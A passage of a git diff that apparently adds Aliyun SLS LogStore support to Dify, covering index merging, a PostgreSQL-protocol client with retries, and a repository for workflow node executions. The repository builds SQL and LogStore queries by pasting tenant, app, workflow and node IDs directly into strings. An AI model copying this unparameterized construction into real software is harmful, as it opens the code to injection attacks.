AliyunLogStore.workflow_execution_logstore: + field_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + field_keys = self._get_workflow_node_execution_index_keys() + + # key_config_list should be a dict, not a list + # Create index config with both line and field indexes + return IndexConfig(line_config=line_config, key_config_list=field_keys, scan_index=True) + + def create_index(self, logstore_name: str) -> None: + """ + Create index for the specified logstore with both full-text and field indexes. + Field indexes are automatically generated from the corresponding SQLAlchemy model. 
+ """ + index_config = self._get_index_config(logstore_name) + + try: + self.client.create_index(self.project_name, logstore_name, index_config) + logger.info( + "index for %s created successfully with %d field indexes", + logstore_name, + len(index_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to create index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def _merge_index_configs( + self, existing_config: IndexConfig, required_keys: dict[str, IndexKeyConfig], logstore_name: str + ) -> tuple[IndexConfig, bool]: + """ + Intelligently merge existing index config with Dify's required field indexes. + + This method: + 1. Preserves all existing field indexes in logstore (including custom fields) + 2. Adds missing Dify-required fields + 3. Updates fields where type doesn't match (with json/text compatibility) + 4. Corrects case mismatches (e.g., if Dify needs 'status' but logstore has 'Status') + + Type compatibility rules: + - json and text types are considered compatible (users can manually choose either) + - All other type mismatches will be corrected to match Dify requirements + + Note: Logstore is case-sensitive and doesn't allow duplicate fields with different cases. + Case mismatch means: existing field name differs from required name only in case. + + Args: + existing_config: Current index configuration from logstore + required_keys: Dify's required field index configurations + logstore_name: Name of the logstore (for logging) + + Returns: + Tuple of (merged_config, needs_update) + """ + # key_config_list is already a dict in the SDK + # Make a copy to avoid modifying the original + existing_keys = dict(existing_config.key_config_list) if existing_config.key_config_list else {} + + # Track changes + needs_update = False + case_corrections = [] # Fields that need case correction (e.g., 'Status' -> 'status') + missing_fields = [] + type_mismatches = [] + + # First pass: Check for and resolve case mismatches with required fields + # Note: Logstore itself doesn't allow duplicate fields with different cases, + # so we only need to check if the existing case matches the required case + for required_name in required_keys: + lower_name = required_name.lower() + # Find key that matches case-insensitively but not exactly + wrong_case_key = None + for existing_key in existing_keys: + if existing_key.lower() == lower_name and existing_key != required_name: + wrong_case_key = existing_key + break + + if wrong_case_key: + # Field exists but with wrong case (e.g., 'Status' when we need 'status') + # Remove the wrong-case key, will be added back with correct case later + case_corrections.append((wrong_case_key, required_name)) + del existing_keys[wrong_case_key] + needs_update = True + + # Second pass: Check each required field + for required_name, required_config in required_keys.items(): + # Check for exact match (case-sensitive) + if required_name in existing_keys: + existing_type = existing_keys[required_name].index_type + required_type = required_config.index_type + + # Check if type matches + # Special case: json and text are interchangeable for JSON content fields + # Allow users to manually configure text instead of json (or vice versa) without forcing updates + is_compatible = existing_type == required_type or ({existing_type, required_type} == {"json", "text"}) + + if not is_compatible: + type_mismatches.append((required_name, 
existing_type, required_type)) + # Update with correct type + existing_keys[required_name] = required_config + needs_update = True + # else: field exists with compatible type, no action needed + else: + # Field doesn't exist (may have been removed in first pass due to case conflict) + missing_fields.append(required_name) + existing_keys[required_name] = required_config + needs_update = True + + # Log changes + if missing_fields: + logger.info( + "Logstore %s: Adding %d missing Dify-required fields: %s", + logstore_name, + len(missing_fields), + ", ".join(missing_fields[:10]) + ("..." if len(missing_fields) > 10 else ""), + ) + + if type_mismatches: + logger.info( + "Logstore %s: Fixing %d type mismatches: %s", + logstore_name, + len(type_mismatches), + ", ".join([f"{name}({old}->{new})" for name, old, new in type_mismatches[:5]]) + + ("..." if len(type_mismatches) > 5 else ""), + ) + + if case_corrections: + logger.info( + "Logstore %s: Correcting %d field name cases: %s", + logstore_name, + len(case_corrections), + ", ".join([f"'{old}' -> '{new}'" for old, new in case_corrections[:5]]) + + ("..." if len(case_corrections) > 5 else ""), + ) + + # Create merged config + # key_config_list should be a dict, not a list + # Preserve the original scan_index value - don't force it to True + merged_config = IndexConfig( + line_config=existing_config.line_config + or IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True), + key_config_list=existing_keys, + scan_index=existing_config.scan_index, + ) + + return merged_config, needs_update + + def ensure_index_config(self, logstore_name: str) -> None: + """ + Ensure index configuration includes all Dify-required fields. + + This method intelligently manages index configuration: + 1. If index doesn't exist, create it with Dify's required fields + 2. If index exists: + - Check if all Dify-required fields are present + - Check if field types match requirements + - Only update if fields are missing or types are incorrect + - Preserve any additional custom index configurations + + This approach allows users to add their own custom indexes without being overwritten. 
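# [Editor's note] Illustrative sketch, not part of this diff: the merge rules
# above reduced to plain dicts mapping field name -> index type. It preserves
# custom fields, adds missing required ones, treats json/text as
# interchangeable, and resolves case-only name clashes in favor of the required
# spelling.
def merge(existing: dict[str, str], required: dict[str, str]) -> tuple[dict[str, str], bool]:
    merged, changed = dict(existing), False
    for name in required:
        for key in list(merged):
            if key.lower() == name.lower() and key != name:
                del merged[key]  # case mismatch: drop here, re-add below
                changed = True
    for name, req_type in required.items():
        cur = merged.get(name)
        compatible = cur == req_type or {cur, req_type} == {"json", "text"}
        if cur is None or not compatible:
            merged[name] = req_type
            changed = True
    return merged, changed

print(merge({"Status": "text", "custom": "long"}, {"status": "text", "inputs": "json"}))
# ({'custom': 'long', 'status': 'text', 'inputs': 'json'}, True)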
+ """ + # Get Dify's required field indexes + required_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + required_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + required_keys = self._get_workflow_node_execution_index_keys() + + # Check if index exists + existing_config = self.get_existing_index_config(logstore_name) + + if existing_config is None: + # Index doesn't exist, create it + logger.info( + "Logstore %s: Index doesn't exist, creating with %d required fields", + logstore_name, + len(required_keys), + ) + self.create_index(logstore_name) + else: + merged_config, needs_update = self._merge_index_configs(existing_config, required_keys, logstore_name) + + if needs_update: + logger.info("Logstore %s: Updating index to include Dify-required fields", logstore_name) + try: + self.client.update_index(self.project_name, logstore_name, merged_config) + logger.info( + "Logstore %s: Index updated successfully, now has %d total field indexes", + logstore_name, + len(merged_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to update index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + else: + logger.info( + "Logstore %s: Index already contains all %d Dify-required fields with correct types, " + "no update needed", + logstore_name, + len(required_keys), + ) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]]) -> None: + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + self._pg_client.put_log(logstore, contents, self.log_enabled) + else: + log_item = LogItem(contents=contents) + request = PutLogsRequest(project=self.project_name, logstore=logstore, logitems=[log_item]) + + if self.log_enabled: + logger.info( + "[LogStore-SDK] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + try: + self.client.put_logs(request) + except LogException as e: + logger.exception( + "Failed to put logs to logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def get_logs( + self, + logstore: str, + from_time: int, + to_time: int, + topic: str = "", + query: str = "", + line: int = 100, + offset: int = 0, + reverse: bool = True, + ) -> list[dict]: + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + topic=topic, + query=query, + line=line, + offset=offset, + reverse=reverse, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS | logstore=%s | project=%s | query=%s | " + "from_time=%d | to_time=%d | line=%d | offset=%d | reverse=%s", + logstore, + self.project_name, + query, + from_time, + to_time, + line, + offset, + reverse, + ) + + try: + response = self.client.get_logs(request) + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + logger.exception( + "Failed to get logs from logstore %s with query '%s': 
errorCode=%s, errorMessage=%s, requestId=%s",
+                logstore,
+                query,
+                e.get_error_code(),
+                e.get_error_message(),
+                e.get_request_id(),
+            )
+            raise
+
+    def execute_sql(
+        self,
+        sql: str,
+        logstore: str | None = None,
+        query: str = "*",
+        from_time: int | None = None,
+        to_time: int | None = None,
+        power_sql: bool = False,
+    ) -> list[dict]:
+        """
+        Execute SQL query for aggregation and analysis.
+
+        Args:
+            sql: SQL query string (SELECT statement)
+            logstore: Name of the logstore (required)
+            query: Search/filter query for SDK mode (default: "*" for all logs).
+                   Only used in SDK mode. PG mode ignores this parameter.
+            from_time: Start time (Unix timestamp) - only used in SDK mode
+            to_time: End time (Unix timestamp) - only used in SDK mode
+            power_sql: Whether to use enhanced SQL mode (default: False)
+
+        Returns:
+            List of result rows as dictionaries
+
+        Note:
+            - PG mode: Only executes the SQL directly
+            - SDK mode: Combines query and sql as "query | sql"
+        """
+        # Logstore is required
+        if not logstore:
+            raise ValueError("logstore parameter is required for execute_sql")
+
+        # Route to PG or SDK based on protocol availability
+        if self._use_pg_protocol and self._pg_client:
+            # PG mode: execute SQL directly (ignore query parameter)
+            return self._pg_client.execute_sql(sql, logstore, self.log_enabled)
+        else:
+            # SDK mode: combine query and sql as "query | sql"
+            full_query = f"{query} | {sql}"
+
+            # Provide default time range if not specified
+            if from_time is None:
+                from_time = 0
+
+            if to_time is None:
+                to_time = int(time.time())  # now
+
+            request = GetLogsRequest(
+                project=self.project_name,
+                logstore=logstore,
+                fromTime=from_time,
+                toTime=to_time,
+                query=full_query,
+            )
+
+            # Log query info if SQLALCHEMY_ECHO is enabled
+            if self.log_enabled:
+                logger.info(
+                    "[LogStore-SDK] EXECUTE_SQL | logstore=%s | project=%s | from_time=%d | to_time=%d | full_query=%s",
+                    logstore,
+                    self.project_name,
+                    from_time,
+                    to_time,
+                    full_query,
+                )
+
+            try:
+                response = self.client.get_logs(request)
+
+                result = []
+                logs = response.get_logs() if response else []
+                for log in logs:
+                    result.append(log.get_contents())
+
+                # Log result count if SQLALCHEMY_ECHO is enabled
+                if self.log_enabled:
+                    logger.info(
+                        "[LogStore-SDK] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d",
+                        logstore,
+                        len(result),
+                    )
+
+                return result
+            except LogException as e:
+                logger.exception(
+                    "Failed to execute SQL, logstore %s: errorCode=%s, errorMessage=%s, requestId=%s, full_query=%s",
+                    logstore,
+                    e.get_error_code(),
+                    e.get_error_message(),
+                    e.get_request_id(),
+                    full_query,
+                )
+                raise
+
+
+if __name__ == "__main__":
+    aliyun_logstore = AliyunLogStore()
+    # aliyun_logstore.init_project_logstore()
+    aliyun_logstore.put_log(AliyunLogStore.workflow_execution_logstore, [("key1", "value1")])
diff --git a/api/extensions/logstore/aliyun_logstore_pg.py b/api/extensions/logstore/aliyun_logstore_pg.py
new file mode 100644
index 0000000000..35aa51ce53
--- /dev/null
+++ b/api/extensions/logstore/aliyun_logstore_pg.py
@@ -0,0 +1,407 @@
+import logging
+import os
+import socket
+import time
+from collections.abc import Sequence
+from contextlib import contextmanager
+from typing import Any
+
+import psycopg2
+import psycopg2.pool
+from psycopg2 import InterfaceError, OperationalError
+
+from configs import dify_config
+
+logger = logging.getLogger(__name__)
+
+
+class AliyunLogStorePG:
+    """
+    PostgreSQL protocol support for Aliyun SLS LogStore. 
+ + Handles PG connection pooling and operations for regions that support PG protocol. + """ + + def __init__(self, access_key_id: str, access_key_secret: str, endpoint: str, project_name: str): + """ + Initialize PG connection for SLS. + + Args: + access_key_id: Aliyun access key ID + access_key_secret: Aliyun access key secret + endpoint: SLS endpoint + project_name: SLS project name + """ + self._access_key_id = access_key_id + self._access_key_secret = access_key_secret + self._endpoint = endpoint + self.project_name = project_name + self._pg_pool: psycopg2.pool.SimpleConnectionPool | None = None + self._use_pg_protocol = False + + def _check_port_connectivity(self, host: str, port: int, timeout: float = 2.0) -> bool: + """ + Check if a TCP port is reachable using socket connection. + + This provides a fast check before attempting full database connection, + preventing long waits when connecting to unsupported regions. + + Args: + host: Hostname or IP address + port: Port number + timeout: Connection timeout in seconds (default: 2.0) + + Returns: + True if port is reachable, False otherwise + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + result = sock.connect_ex((host, port)) + sock.close() + return result == 0 + except Exception as e: + logger.debug("Port connectivity check failed for %s:%d: %s", host, port, str(e)) + return False + + def init_connection(self) -> bool: + """ + Initialize PostgreSQL connection pool for SLS PG protocol support. + + Attempts to connect to SLS using PostgreSQL protocol. If successful, sets + _use_pg_protocol to True and creates a connection pool. If connection fails + (region doesn't support PG protocol or other errors), returns False. + + Returns: + True if PG protocol is supported and initialized, False otherwise + """ + try: + # Extract hostname from endpoint (remove protocol if present) + pg_host = self._endpoint.replace("http://", "").replace("https://", "") + + # Get pool configuration + pg_max_connections = int(os.environ.get("ALIYUN_SLS_PG_MAX_CONNECTIONS", 10)) + + logger.debug( + "Check PG protocol connection to SLS: host=%s, project=%s", + pg_host, + self.project_name, + ) + + # Fast port connectivity check before attempting full connection + # This prevents long waits when connecting to unsupported regions + if not self._check_port_connectivity(pg_host, 5432, timeout=1.0): + logger.info( + "USE SDK mode for read/write operations, host=%s", + pg_host, + ) + return False + + # Create connection pool + self._pg_pool = psycopg2.pool.SimpleConnectionPool( + minconn=1, + maxconn=pg_max_connections, + host=pg_host, + port=5432, + database=self.project_name, + user=self._access_key_id, + password=self._access_key_secret, + sslmode="require", + connect_timeout=5, + application_name=f"Dify-{dify_config.project.version}", + ) + + # Note: Skip test query because SLS PG protocol only supports SELECT/INSERT on actual tables + # Connection pool creation success already indicates connectivity + + self._use_pg_protocol = True + logger.info( + "PG protocol initialized successfully for SLS project=%s. 
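# [Editor's note] Illustrative sketch, not part of this diff: the fast TCP
# pre-check above, standalone. connect_ex returns an errno instead of raising,
# so an unsupported region fails within the short timeout rather than waiting
# out a full database connection attempt. The host below is hypothetical.
import socket

def port_reachable(host: str, port: int, timeout: float = 1.0) -> bool:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            return sock.connect_ex((host, port)) == 0
    except OSError:  # e.g. DNS resolution failure
        return False

if not port_reachable("sls.example.invalid", 5432):
    print("PG port unreachable, falling back to SDK mode")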
Will use PG for read/write operations.",
+                self.project_name,
+            )
+            return True
+
+        except Exception as e:
+            # PG connection failed - fall back to SDK mode
+            self._use_pg_protocol = False
+            if self._pg_pool:
+                try:
+                    self._pg_pool.closeall()
+                except Exception:
+                    logger.debug("Failed to close PG connection pool during cleanup, ignoring")
+                self._pg_pool = None
+
+            logger.info(
+                "PG protocol connection failed (region may not support PG protocol): %s. "
+                "Falling back to SDK mode for read/write operations.",
+                str(e),
+            )
+            return False
+
+    def _is_connection_valid(self, conn: Any) -> bool:
+        """
+        Check if a connection is still valid.
+
+        Args:
+            conn: psycopg2 connection object
+
+        Returns:
+            True if connection is valid, False otherwise
+        """
+        try:
+            # SLS PG protocol only supports SELECT/INSERT on actual tables, so a
+            # table-less ping such as SELECT 1 would be rejected; rely on the
+            # connection's closed flag instead of issuing a probe query.
+            return not conn.closed
+        except Exception:
+            return False
+
+    @contextmanager
+    def _get_connection(self):
+        """
+        Context manager to get a PostgreSQL connection from the pool.
+
+        Automatically validates and refreshes stale connections.
+
+        Note: Aliyun SLS PG protocol does not support transactions, so we always
+        use autocommit mode.
+
+        Yields:
+            psycopg2 connection object
+
+        Raises:
+            RuntimeError: If PG pool is not initialized
+        """
+        if not self._pg_pool:
+            raise RuntimeError("PG connection pool is not initialized")
+
+        conn = self._pg_pool.getconn()
+        try:
+            # Validate connection and get a fresh one if needed
+            if not self._is_connection_valid(conn):
+                logger.debug("Connection is stale, marking as bad and getting a new one")
+                # Mark connection as bad and get a new one
+                self._pg_pool.putconn(conn, close=True)
+                conn = self._pg_pool.getconn()
+
+            # Aliyun SLS PG protocol does not support transactions, always use autocommit
+            conn.autocommit = True
+            yield conn
+        finally:
+            # Return connection to pool (or close if it's bad)
+            if self._is_connection_valid(conn):
+                self._pg_pool.putconn(conn)
+            else:
+                self._pg_pool.putconn(conn, close=True)
+
+    def close(self) -> None:
+        """Close the PostgreSQL connection pool."""
+        if self._pg_pool:
+            try:
+                self._pg_pool.closeall()
+                logger.info("PG connection pool closed")
+            except Exception:
+                logger.exception("Failed to close PG connection pool")
+
+    def _is_retriable_error(self, error: Exception) -> bool:
+        """
+        Check if an error is retriable (connection-related issues).
+
+        Args:
+            error: Exception to check
+
+        Returns:
+            True if the error is retriable, False otherwise
+        """
+        # Retry on connection-related errors
+        if isinstance(error, (OperationalError, InterfaceError)):
+            return True
+
+        # Check error message for specific connection issues
+        error_msg = str(error).lower()
+        retriable_patterns = [
+            "connection",
+            "timeout",
+            "closed",
+            "broken pipe",
+            "reset by peer",
+            "no route to host",
+            "network",
+        ]
+        return any(pattern in error_msg for pattern in retriable_patterns)
+
+    def put_log(self, logstore: str, contents: Sequence[tuple[str, str]], log_enabled: bool = False) -> None:
+        """
+        Write log to SLS using PostgreSQL protocol with automatic retry.
+
+        Note: SLS PG protocol only supports INSERT (not UPDATE). This uses append-only
+        writes with log_version field for versioning, same as SDK implementation. 
+ + Args: + logstore: Name of the logstore table + contents: List of (field_name, value) tuples + log_enabled: Whether to enable logging + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if not contents: + return + + # Extract field names and values from contents + fields = [field_name for field_name, _ in contents] + values = [value for _, value in contents] + + # Build INSERT statement with literal values + # Note: Aliyun SLS PG protocol doesn't support parameterized queries, + # so we need to use mogrify to safely create literal values + field_list = ", ".join([f'"{field}"' for field in fields]) + + if log_enabled: + logger.info( + "[LogStore-PG] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + # Use mogrify to safely convert values to SQL literals + placeholders = ", ".join(["%s"] * len(fields)) + values_literal = cursor.mogrify(f"({placeholders})", values).decode("utf-8") + insert_sql = f'INSERT INTO "{logstore}" ({field_list}) VALUES {values_literal}' + cursor.execute(insert_sql) + # Success - exit retry loop + return + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., data validation error), fail immediately + logger.exception( + "Failed to put logs to logstore %s via PG protocol (non-retriable error)", + logstore, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to put logs to logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to put logs to logstore %s via PG protocol after %d attempts", + logstore, + max_retries, + ) + raise + + def execute_sql(self, sql: str, logstore: str, log_enabled: bool = False) -> list[dict[str, Any]]: + """ + Execute SQL query using PostgreSQL protocol with automatic retry. 
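# [Editor's note] Illustrative sketch, not part of this diff: the retry loop
# shared by put_log/execute_sql, generalized into a helper. Only errors the
# caller classifies as retriable are retried, and the sleep doubles after each
# failed attempt (0.1s, 0.2s, 0.4s). Function names are hypothetical.
import time

def with_retries(op, is_retriable, max_retries: int = 3, base_delay: float = 0.1):
    delay = base_delay
    for attempt in range(max_retries):
        try:
            return op()
        except Exception as e:
            if not is_retriable(e) or attempt == max_retries - 1:
                raise  # non-retriable, or out of attempts
            time.sleep(delay)
            delay *= 2  # exponential backoff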
+ + Args: + sql: SQL query string + logstore: Name of the logstore (for logging purposes) + log_enabled: Whether to enable logging + + Returns: + List of result rows as dictionaries + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL | logstore=%s | project=%s | sql=%s", + logstore, + self.project_name, + sql, + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + cursor.execute(sql) + + # Get column names from cursor description + columns = [desc[0] for desc in cursor.description] + + # Fetch all results and convert to list of dicts + result = [] + for row in cursor.fetchall(): + row_dict = {} + for col, val in zip(columns, row): + row_dict[col] = "" if val is None else str(val) + result.append(row_dict) + + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., SQL syntax error), fail immediately + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol (non-retriable error): sql=%s", + logstore, + sql, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to execute SQL query on logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol after %d attempts: sql=%s", + logstore, + max_retries, + sql, + ) + raise + + # This line should never be reached due to raise above, but makes type checker happy + return [] diff --git a/api/extensions/logstore/repositories/__init__.py b/api/extensions/logstore/repositories/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py new file mode 100644 index 0000000000..8c804d6bb5 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py @@ -0,0 +1,365 @@ +""" +LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + +This module provides the LogStore-based implementation for service-layer +WorkflowNodeExecutionModel operations using Aliyun SLS LogStore. +""" + +import logging +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from models.workflow import WorkflowNodeExecutionModel +from repositories.api_workflow_node_execution_repository import DifyAPIWorkflowNodeExecutionRepository + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution_model(data: dict[str, Any]) -> WorkflowNodeExecutionModel: + """ + Convert LogStore result dictionary to WorkflowNodeExecutionModel instance. 
+ + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecutionModel instance (detached from session) + + Note: + The returned model is not attached to any SQLAlchemy session. + Relationship fields (like offload_data) are not loaded from LogStore. + """ + logger.debug("_dict_to_workflow_node_execution_model: data keys=%s", list(data.keys())[:5]) + # Create model instance without session + model = WorkflowNodeExecutionModel() + + # Map all required fields with validation + # Critical fields - must not be None + model.id = data.get("id") or "" + model.tenant_id = data.get("tenant_id") or "" + model.app_id = data.get("app_id") or "" + model.workflow_id = data.get("workflow_id") or "" + model.triggered_from = data.get("triggered_from") or "" + model.node_id = data.get("node_id") or "" + model.node_type = data.get("node_type") or "" + model.status = data.get("status") or "running" # Default status if missing + model.title = data.get("title") or "" + model.created_by_role = data.get("created_by_role") or "" + model.created_by = data.get("created_by") or "" + + # Numeric fields with defaults + model.index = int(data.get("index", 0)) + model.elapsed_time = float(data.get("elapsed_time", 0)) + + # Optional fields + model.workflow_run_id = data.get("workflow_run_id") + model.predecessor_node_id = data.get("predecessor_node_id") + model.node_execution_id = data.get("node_execution_id") + model.inputs = data.get("inputs") + model.process_data = data.get("process_data") + model.outputs = data.get("outputs") + model.error = data.get("error") + model.execution_metadata = data.get("execution_metadata") + + # Handle datetime fields + created_at = data.get("created_at") + if created_at: + if isinstance(created_at, str): + model.created_at = datetime.fromisoformat(created_at) + elif isinstance(created_at, (int, float)): + model.created_at = datetime.fromtimestamp(created_at) + else: + model.created_at = created_at + else: + # Provide default created_at if missing + model.created_at = datetime.now() + + finished_at = data.get("finished_at") + if finished_at: + if isinstance(finished_at, str): + model.finished_at = datetime.fromisoformat(finished_at) + elif isinstance(finished_at, (int, float)): + model.finished_at = datetime.fromtimestamp(finished_at) + else: + model.finished_at = finished_at + + return model + + +class LogstoreAPIWorkflowNodeExecutionRepository(DifyAPIWorkflowNodeExecutionRepository): + """ + LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + + Provides service-layer database operations for WorkflowNodeExecutionModel + using LogStore SQL queries with optimized deduplication strategies. + """ + + def __init__(self, session_maker: sessionmaker | None = None): + """ + Initialize the repository with LogStore client. + + Args: + session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern) + """ + logger.debug("LogstoreAPIWorkflowNodeExecutionRepository.__init__: initializing") + self.logstore_client = AliyunLogStore() + + def get_node_last_execution( + self, + tenant_id: str, + app_id: str, + workflow_id: str, + node_id: str, + ) -> WorkflowNodeExecutionModel | None: + """ + Get the most recent execution for a specific node. + + Uses query syntax to get raw logs and selects the one with max log_version. + Returns the most recent execution ordered by created_at. 
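+
+        Versioning note: writes are append-only and each record carries a
+        nanosecond log_version, so "latest" always means the row with the
+        highest log_version per id (ROW_NUMBER() in PG mode, a Python
+        group-and-max in SDK mode).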
+ """ + logger.debug( + "get_node_last_execution: tenant_id=%s, app_id=%s, workflow_id=%s, node_id=%s", + tenant_id, + app_id, + workflow_id, + node_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_id = '{workflow_id}' + AND node_id = '{node_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = ( + f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_id: {workflow_id} and node_id: {node_id}" + ) + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + deduplicated_results = [] + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + deduplicated_results.append(max_row) + else: + # For PG mode, results are already deduplicated by the SQL query + deduplicated_results = results + + # Sort by created_at DESC and return the most recent one + deduplicated_results.sort( + key=lambda x: x.get("created_at", 0) if isinstance(x.get("created_at"), (int, float)) else 0, + reverse=True, + ) + + if deduplicated_results: + return _dict_to_workflow_node_execution_model(deduplicated_results[0]) + + return None + + except Exception: + logger.exception("Failed to get node last execution from LogStore") + raise + + def get_executions_by_workflow_run( + self, + tenant_id: str, + app_id: str, + workflow_run_id: str, + ) -> Sequence[WorkflowNodeExecutionModel]: + """ + Get all node executions for a specific workflow run. + + Uses query syntax to get raw logs and selects the one with max log_version for each node execution. + Ordered by index DESC for trace visualization. 
+ """ + logger.debug( + "[LogStore] get_executions_by_workflow_run: tenant_id=%s, app_id=%s, workflow_run_id=%s", + tenant_id, + app_id, + workflow_run_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_run_id = '{workflow_run_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1000 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_run_id: {workflow_run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=1000, # Get more results for node executions + reverse=False, + ) + + if not results: + return [] + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + models = [] + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + + model = _dict_to_workflow_node_execution_model(max_row) + if model and model.id: # Ensure model is valid + models.append(model) + else: + # For PG mode, results are already deduplicated by the SQL query + for row in results: + model = _dict_to_workflow_node_execution_model(row) + if model and model.id: # Ensure model is valid + models.append(model) + + # Sort by index DESC for trace visualization + models.sort(key=lambda x: x.index, reverse=True) + + return models + + except Exception: + logger.exception("Failed to get executions by workflow run from LogStore") + raise + + def get_execution_by_id( + self, + execution_id: str, + 